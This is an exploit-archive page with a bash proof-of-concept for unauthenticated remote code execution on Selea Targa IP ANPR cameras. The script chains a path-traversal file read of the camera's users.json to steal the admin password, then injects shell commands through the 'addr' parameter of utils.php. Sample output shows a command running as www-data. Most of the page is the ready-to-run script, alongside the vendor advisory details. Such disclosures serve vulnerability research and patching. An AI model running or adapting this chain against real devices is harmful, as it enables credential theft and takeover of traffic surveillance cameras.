what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Selea Targa IP OCR-ANPR Camera Remote Code Execution

Selea Targa IP OCR-ANPR Camera Remote Code Execution
Posted Jan 22, 2021
Authored by LiquidWorm | Site zeroscience.mk

Selea Targa IP OCR-ANPR Camera suffers from an unauthenticated remote code execution vulnerability. Multiple versions and firmwares are affected.

tags | exploit, remote, code execution
SHA-256 | a20d2682117b5a184bee0448cff2196e9eac5026cf5a34402863b70c9fca14dd

Selea Targa IP OCR-ANPR Camera Remote Code Execution

Change Mirror Download
#!/bin/bash
#
# Selea Targa IP OCR-ANPR Camera Unauthenticated Remote Code Execution
#
#
# Vendor: Selea s.r.l.
# Product web page: https://www.selea.com
# Affected version: Model: iZero
# Targa 512
# Targa 504
# Targa Semplice
# Targa 704 TKM
# Targa 805
# Targa 710 INOX
# Targa 750
# Targa 704 ILB
# Firmware: BLD201113005214
# BLD201106163745
# BLD200304170901
# BLD200304170514
# BLD200303143345
# BLD191118145435
# BLD191021180140
# BLD191021180140
# CPS: 4.013(201105)
# 3.100(200225)
# 3.005(191206)
# 3.005(191112)
#
# Summary: IP camera with optical character recognition (OCR) software for automatic
# number plate recognition (ANPR) also equipped with ADR system that enables it to read
# the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number
# of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number
# plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes
# this camera suitable for all installation conditions. Its built-in OCR software works
# as an automatic and independent system without the need of a computer, thus giving
# autonomy to the device even in the event of an interruption in the connection between
# the camera and the operations centre.
#
# Desc: Selea suffers from an authenticated command injection vulnerability. This can be
# exploited to inject and execute arbitrary shell commands as the www-data user through
# the 'addr' and 'port' HTTP GET parameters in utils.php page. Chaining the unauthenticated
# LFI issue an attacker can grab credentials, authenticate and execute system commands.
#
# =====================================================================================
# /mnt/app/scripts/address_check.sh:
# ----------------------------------
#
# 01: #!/bin/sh
# 02: . /mnt/app/scripts/env.sh
# 03: . /mnt/app/scripts/log.sh
# 04:
# 05: CMD="$1"
# 06: ADDR="$2"
# 07: PORT="$3"
# 08:
# 09: if [ "$CMD" == "ping" ]; then
# 10: RESULT=$(/bin/ping -I eth0 -W 1 -q -c 1 "$ADDR" 2>&1 )
# 11: elif [ "$CMD" == "port" ]; then
# 12: log "/usr/bin/nc -w 1 -v -z $ADDR $PORT"
# 13: RESULT=$(/usr/bin/nc -w 1 -v -z "$ADDR" "$PORT" 2>&1 )
# 14: fi
# 15:
# 16: echo -e "$RESULT"
#
# =====================================================================================
#
# Tested on: GNU/Linux 3.10.53 (armv7l)
# PHP/5.6.22
# selea_httpd
# HttpServer/0.1
# SeleaCPSHttpServer/1.1
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2021-5620
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5620.php
#
#
# 07.11.2020
#
#


# PoC chained exploit (as admin):
#
# solidsnake@metalgear:~/prive$ ./selea.sh 192.168.1.17 id
# Password found: testingus
# Using Authorization: YWRtaW46dGVzdGluZ3VzCg==
# Using command: id
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
#
#
IP=$1
CMD=$2
PWD=`curl -s https://${IP}/CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fmnt/data/auth/users.json |grep -oP 'root_pwd": "\K.*?(?=",)'`
echo 'Password found: '${PWD}
AUTH=$(echo admin:${PWD} | base64)
echo 'Using Authorization: '${AUTH}
echo 'Using command: '${CMD}
curl -s "https://${IP}/cgi-bin/utils.php?cmd=addr_check&addr=1.3.3.7\$(${CMD})&type=port&port=80" -H "Authorization: Basic ${AUTH}" |grep -oP '1.3.3.7\K.*?(?=")'
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close